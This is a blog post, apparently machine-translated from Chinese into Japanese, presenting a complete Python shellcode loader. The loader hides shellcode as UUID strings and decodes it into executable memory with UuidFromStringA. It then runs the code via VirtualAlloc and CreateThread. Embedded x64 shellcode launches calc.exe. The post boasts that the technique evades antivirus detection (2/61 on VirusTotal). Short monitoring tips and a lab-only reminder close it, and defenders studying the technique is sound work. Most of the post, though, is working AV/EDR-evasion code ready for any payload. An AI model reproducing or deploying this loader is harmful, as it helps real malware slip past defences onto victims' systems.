banner
andrewji8

Being towards death

Heed not to the tree-rustling and leaf-lashing rain, Why not stroll along, whistle and sing under its rein. Lighter and better suited than horses are straw sandals and a bamboo staff, Who's afraid? A palm-leaf plaited cape provides enough to misty weather in life sustain. A thorny spring breeze sobers up the spirit, I feel a slight chill, The setting sun over the mountain offers greetings still. Looking back over the bleak passage survived, The return in time Shall not be affected by windswept rain or shine.
telegram
twitter
github
ホームアーカイブ

悪意のあるコードの隠れた世界:UUIDとdeepseek-v3-0324の完璧な組み合わせ

#渗透50
AI 翻訳
この記事はAIを通じて中国語から日本語に翻訳されました。原文を表示
AI が生成した要約
UUID(通用唯一标识符)は、128ビットの値で、ソフトウェアシステムでのユニークな参照を提供するために使用されます。UUIDは通常、16進数の文字列として表され、5つの部分に分かれています。UUIDは衝突の可能性が非常に低いため、分散システムでのオブジェクトや記録の識別に適しています。 悪意のあるスクリプトは、MicrosoftのAPI関数UuidFromStringA()を利用してUUID文字列をバイナリ形式に変換し、デコードされたUUIDをメモリに注入して実行します。この手法を使用するマルウェアは、検出を回避する可能性が高いです。 PythonでのUUIDベースのShellcodeローダーの実装例では、ShellcodeをUUID形式にエンコードし、メモリにロードして実行する方法が示されています。具体的には、Shellcodeを16バイトのチャンクに分割し、不足分はNOP(0x90)で埋めます。

まず UUID について理解しましょう: UUID(ユニバーサルユニーク識別子)は、128 ビットの値で、ソフトウェアシステムで一般的に使用され、ほぼユニークであることが保証される参照を提供します。通常、16 進数の数字で構成された文字列形式で表され、5 つの部分に分割されます。その構造と生成方法(タイムスタンプまたはランダム数に基づく)により、UUID が衝突する可能性は非常に低いため、分散システムでオブジェクトや記録を識別するのに非常に適しています。特に、中央集権的なユニーク管理メカニズムが欠如しているシナリオで有効です。

悪意のあるスクリプトは、主に Microsoft が提供する API 関数: UuidFromStringA () を利用しています。この関数は UUID 文字列をバイナリ形式に変換できます。したがって、上記の一連の UUID は、元のバイトにデコードされると、シェルコードとしてメモリに注入されて実行されます。この技術を利用するマルウェアは追跡を逃れる確率が非常に高く、VT スコアはわずか: 2/61 です。

UUID ベースのシェルコードローダー(Python 実装)
このコードは、攻撃者がシェルコードを UUID 形式にエンコードし、メモリにロードして実行する方法をシミュレートしています。実際の攻撃では、このようなコードは AV/EDR 検出を回避するために使用される可能性があります。

簡単なシェルコード(例えば、calc.exe を起動する x64 シェルコード)があると仮定し、それを 16 バイトのブロックに分割し、UUID 形式に変換します:

import ctypes
import uuid

def generate_uuid_shellcode(shellcode):
    """シェルコードをUUID形式の文字列リストに変換します"""
    uuid_shellcode = []
    for i in range(0, len(shellcode), 16):
        chunk = shellcode[i:i+16]
        # 不足16バイトはNOP (0x90) で埋める
        if len(chunk) < 16:
            chunk += b"\x90" * (16 - len(chunk))
        uuid_str = str(uuid.UUID(bytes_le=chunk))
        uuid_shellcode.append(uuid_str)
    return uuid_shellcode

def execute_uuid_shellcode(uuid_shellcode):
    """メモリにUUID形式のシェルコードをロードして実行します"""
    # 読み取り、書き込み、実行可能なメモリを割り当てる (RWX)
    rwx_page = ctypes.windll.kernel32.VirtualAlloc(
        ctypes.c_int(0),
        ctypes.c_int(len(uuid_shellcode) * 16),
        ctypes.c_int(0x1000),  # MEM_COMMIT
        ctypes.c_int(0x40)     # PAGE_EXECUTE_READWRITE
    )
    if not rwx_page:
        print("[!] VirtualAllocに失敗しました!")
        return False

    # UUID文字列をバイナリに戻してメモリに書き込む
    ptr = rwx_page
    for u in uuid_shellcode:
        status = ctypes.windll.rpcrt4.UuidFromStringA(
            ctypes.c_char_p(u.encode()),
            ctypes.c_void_p(ptr)
        )
        if status != 0:
            print(f"[!] UuidFromStringAに失敗しました (ステータス: {status})")
            return False
        ptr += 16

    # スレッドを作成してシェルコードを実行
    thread_handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.c_void_p(rwx_page),
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.pointer(ctypes.c_int(0))
    )
    if not thread_handle:
        print("[!] CreateThreadに失敗しました!")
        return False

    # スレッドの終了を待つ
    ctypes.windll.kernel32.WaitForSingleObject(
        ctypes.c_int(thread_handle),
        ctypes.c_int(-1)
    )
    return True

if __name__ == "__main__":
    # サンプルシェルコード (x64計算機を起動するため、実際の研究目的のシェルコードに置き換える必要があります)
    shellcode = (
        b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        b"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
        b"\x63\x2e\x65\x78\x65\x00"
    )

    # UUID形式のシェルコードを生成
    print("[+] UUID形式のシェルコードを生成中...")
    uuid_shellcode = generate_uuid_shellcode(shellcode)
    for u in uuid_shellcode:
        print(f'"{u}",')

    # シェルコードを実行
    print("\n[+] シェルコードを実行中...")
    if execute_uuid_shellcode(uuid_shellcode):
        print("[+] シェルコードの実行が完了しました!")
    else:
        print("[!] シェルコードの実行に失敗しました!")

重要なコードの説明#

generate_uuid_shellcode#

  • 元のシェルコードを 16 バイトごとに分割します。
  • 各ブロックを UUID 文字列(リトルエンディアン)に変換します。

execute_uuid_shellcode#

  1. VirtualAllocを使用して RWX メモリを割り当てます。
  2. UuidFromStringAを呼び出して UUID をバイナリに戻し、メモリに書き込みます。
  3. CreateThreadを介してメモリ内のシェルコードを実行します。

シェルコードの置き換え#

  • サンプルのシェルコードは x64 計算機のペイロードであり、実際の研究では他の合法的な用途のシェルコード(例えば、脆弱性研究の PoC)に置き換えることができます。

防御の提案#

次の API 呼び出しを監視します:#

  • VirtualAlloc + CreateThreadの組み合わせ。
  • 長い文字列を変換するためのUuidFromStringA

挙動検出:#

  • プロセスが RWX メモリを頻繁に割り当てているかどうかを確認します。
  • EDR ツール(例: Elastic Endpoint)を使用してメモリ注入の挙動をキャッチします。

テスト環境:#

  • このようなコードは隔離された仮想マシン(例: VMware + スナップショット)でのみ実行してください。

常にペネトレーションテストの許可とコンプライアンス要件を遵守してください!

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。